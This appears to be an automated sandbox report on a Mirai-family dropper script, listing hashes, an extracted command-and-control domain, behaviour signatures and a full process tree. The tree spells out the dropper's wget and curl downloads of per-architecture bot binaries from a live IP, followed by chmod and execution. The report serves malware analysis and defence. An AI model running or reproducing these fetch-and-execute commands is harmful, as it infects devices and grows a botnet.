Analysis
-
max time kernel
131s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19-12-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
feelme420.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
feelme420.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
feelme420.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
feelme420.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
feelme420.sh
-
Size
3KB
-
MD5
22e9d65b991f00de3a52071664dc52f9
-
SHA1
2b6dd972572c4c72ecf43bb7b66eebe776cd0360
-
SHA256
7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
-
SHA512
eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted
mirai
chernobyl.stressing.world
Extracted
mirai
chernobyl.stressing.world
Signatures
-
Mirai family
-
Contacts a large (15832) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 742 chmod 876 chmod 888 chmod 682 chmod 756 chmod 806 chmod 816 chmod 844 chmod 672 chmod 722 chmod 766 chmod 828 chmod 693 chmod 707 chmod 854 chmod 866 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/f331m3420 674 f331m3420 /tmp/f331m3420 683 f331m3420 /tmp/f331m3420 695 f331m3420 /tmp/f331m3420 708 f331m3420 /tmp/f331m3420 724 f331m3420 /tmp/f331m3420 743 f331m3420 /tmp/f331m3420 757 f331m3420 /tmp/f331m3420 767 f331m3420 /tmp/f331m3420 807 f331m3420 /tmp/f331m3420 817 f331m3420 /tmp/f331m3420 829 f331m3420 /tmp/f331m3420 845 f331m3420 /tmp/f331m3420 855 f331m3420 /tmp/f331m3420 867 f331m3420 /tmp/f331m3420 877 f331m3420 /tmp/f331m3420 889 f331m3420 -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 -
Enumerates active TCP sockets 1 TTPs 9 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 20 IoCs
description ioc Process File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 -
Reads process memory 1 TTPs 34 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/578/maps f331m3420 File opened for reading /proc/927/maps f331m3420 File opened for reading /proc/940/maps f331m3420 File opened for reading /proc/946/maps f331m3420 File opened for reading /proc/977/maps f331m3420 File opened for reading /proc/642/maps f331m3420 File opened for reading /proc/907/maps f331m3420 File opened for reading /proc/996/maps f331m3420 File opened for reading /proc/579/maps f331m3420 File opened for reading /proc/583/maps f331m3420 File opened for reading /proc/893/maps f331m3420 File opened for reading /proc/912/maps f331m3420 File opened for reading /proc/933/maps f331m3420 File opened for reading /proc/971/maps f331m3420 File opened for reading /proc/891/maps f331m3420 File opened for reading /proc/896/maps f331m3420 File opened for reading /proc/983/maps f331m3420 File opened for reading /proc/924/maps f331m3420 File opened for reading /proc/958/maps f331m3420 File opened for reading /proc/644/maps f331m3420 File opened for reading /proc/647/maps f331m3420 File opened for reading /proc/830/maps f331m3420 File opened for reading /proc/894/maps f331m3420 File opened for reading /proc/901/maps f331m3420 File opened for reading /proc/918/maps f331m3420 File opened for reading /proc/963/maps f331m3420 File opened for reading /proc/965/maps f331m3420 File opened for reading /proc/582/maps f331m3420 File opened for reading /proc/990/maps f331m3420 File opened for reading /proc/643/maps f331m3420 File opened for reading /proc/952/maps f331m3420 File opened for reading /proc/598/maps f331m3420 File opened for reading /proc/938/maps f331m3420 File opened for reading /proc/988/maps f331m3420 -
Changes its process name 10 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 757 f331m3420 Changes the process name, possibly in an attempt to hide itself a 767 f331m3420 Changes the process name, possibly in an attempt to hide itself a 807 f331m3420 Changes the process name, possibly in an attempt to hide itself a 817 f331m3420 Changes the process name, possibly in an attempt to hide itself a 829 f331m3420 Changes the process name, possibly in an attempt to hide itself a 845 f331m3420 Changes the process name, possibly in an attempt to hide itself a 855 f331m3420 Changes the process name, possibly in an attempt to hide itself a 867 f331m3420 Changes the process name, possibly in an attempt to hide itself a 877 f331m3420 Changes the process name, possibly in an attempt to hide itself a 889 f331m3420 -
Checks CPU configuration 1 TTPs 16 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 9 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/1063/maps f331m3420 File opened for reading /proc/1115/maps f331m3420 File opened for reading /proc/1108/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1052/maps f331m3420 File opened for reading /proc/1088/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1071/maps f331m3420 File opened for reading /proc/1121/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1038/maps f331m3420 File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1033/maps f331m3420 File opened for reading /proc/1077/maps f331m3420 File opened for reading /proc/1102/maps f331m3420 File opened for reading /proc/1113/maps f331m3420 File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1002/maps f331m3420 File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1046/maps f331m3420 File opened for reading /proc/1015/maps f331m3420 File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1008/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1058/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1021/maps f331m3420 File opened for reading /proc/1027/maps f331m3420 File opened for reading /proc/1096/maps f331m3420 File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1040/maps f331m3420 File opened for reading /proc/1065/maps f331m3420 File opened for reading /proc/1083/maps f331m3420 File opened for reading /proc/1090/maps f331m3420 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1013/maps f331m3420 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 677 wget 680 curl 681 cat -
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/feelme420.m68k curl File opened for modification /tmp/feelme420.arc wget File opened for modification /tmp/feelme420.i586 curl File opened for modification /tmp/feelme420.x86 curl File opened for modification /tmp/f331m3420 feelme420.sh File opened for modification /tmp/feelme420.arm6 curl File opened for modification /tmp/feelme420.i686 wget File opened for modification /tmp/feelme420.arm curl File opened for modification /tmp/feelme420.sh4 wget File opened for modification /tmp/feelme420.mpsl curl File opened for modification /tmp/feelme420.arm7 curl File opened for modification /tmp/feelme420.m68k wget File opened for modification /tmp/feelme420.spc curl File opened for modification /tmp/feelme420.mips curl File opened for modification /tmp/feelme420.mpsl wget File opened for modification /tmp/feelme420.arm5 wget File opened for modification /tmp/feelme420.ppc wget File opened for modification /tmp/feelme420.i486 curl File opened for modification /tmp/feelme420.ppc curl File opened for modification /tmp/feelme420.i686 curl File opened for modification /tmp/feelme420.i486 wget File opened for modification /tmp/feelme420.mips wget File opened for modification /tmp/feelme420.arm5 curl File opened for modification /tmp/feelme420.arm6 wget File opened for modification /tmp/feelme420.arm7 wget File opened for modification /tmp/feelme420.x86_64 curl File opened for modification /tmp/feelme420.x86 wget File opened for modification /tmp/feelme420.sh4 curl File opened for modification /tmp/feelme420.spc wget File opened for modification /tmp/feelme420.arc curl File opened for modification /tmp/feelme420.x86_64 wget
Processes
-
/tmp/feelme420.sh/tmp/feelme420.sh1⤵
- Writes file to tmp directory
PID:645 -
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:648
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:662
-
-
/bin/catcat feelme420.x862⤵PID:671
-
-
/bin/chmodchmod +x f331m3420 feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:674
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:677
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:680
-
-
/bin/catcat feelme420.mips2⤵
- System Network Configuration Discovery
PID:681
-
-
/bin/chmodchmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:683
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:685
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/catcat feelme420.mpsl2⤵PID:692
-
-
/bin/chmodchmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:695
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm2⤵PID:697
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/catcat feelme420.arm2⤵PID:705
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:708
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/catcat feelme420.arm52⤵PID:721
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:724
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:725
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat feelme420.arm62⤵PID:741
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:745
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/catcat feelme420.arm72⤵PID:755
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:757
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:760
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:767
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:807
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:817
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:822
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/chmodchmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:829
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:838
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x862⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:845
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:848
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:855
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:860
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:867
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i4862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:877
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i5862⤵PID:882
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i5862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/chmodchmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_642⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:889
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD571b0c2e7cc122d6de4a481bea5ebc6d9
SHA1f982ae244188ddd93b797e9548e049b97d2f2c7f
SHA256de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
SHA512f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43
-
Filesize
114KB
MD5e10ad3d97637588b2056db57a546fa7f
SHA1138efa03e54a9f1eaed0e587ea259c182a1289d1
SHA2561ea71a6d347541c7f892d7361fbda4b282fcf5d11aeb7297a8345ce88f78865a
SHA512c6a9455aa701260796fa9f9b466dccf1166bb11cf3c0d9896f43ea9936f695ace78863f230362b884249bc3a110a3e1f4ad659ea5e9163261fb0bc1c349dd71a
-
Filesize
114KB
MD5c5d1f6a6e591069acffcaeb19c405a02
SHA11265bbf1ff14c6b913ced2f63807aaa93137d87b
SHA2566e4e8f08dd7471f62194314808a2d1a19b53db947c707a8839ce56c453656049
SHA51264d63427c40954e8b6c56b2bf56533ed3b06bc347b7add89e15e59fa7ca62ae744ec398384487621b5ace6dd6a6fcb9fe71cdabbcd5ef7379441d9ec779ac5ae
-
Filesize
218B
MD59efd7ff37a85d83af5298b3671491070
SHA124c2fbed0abb244b610f6aa0a429c50902d7a682
SHA256a90c0ae7235ef04a7df3797ab4f15c35e1d5f04fafbf06d81df3e6ce82e7a7b4
SHA51220204386063b3ea13c5db7527c80c8f651b8b6b003c8282335e79f4ded81aabf8e36bed2d238c6da09360e9f94cec954993eb366b409a38b4720c376621c4cf8
-
Filesize
63KB
MD58e8b3e650b8b979fca40999c2aef8077
SHA1af3f71ef4f46e03afc6c060ff3fdb858b98a54eb
SHA256ec953f9e9a20a77753750cf458536542c6e1a6871ea73e2d4dfb74b7055898c4
SHA512bb940245f77d7a2d886e71561f7d3a2beb3f6f0ada5a3a61718abe947be028a93a6eb21833e07d1710f4b425c0767184f5cd41890e81fefcd66e12273971151f
-
Filesize
146KB
MD51fd1ed52897289d90690ca1217e10df9
SHA16a2663a4295793e0bc544d6c554b554688761668
SHA25615b6070e6e1ab9f89a2a55a64a5f6ca794129a75a38d1e88bda0c312254de6ce
SHA512042e4348ae538c0afc9c420347de6cb9f59462c18f6f319e18e3a5861d243ed645d78208d2d384670c7ce34bcd23ad0f6fba5cc8e9f2290ebe847313363f1bf3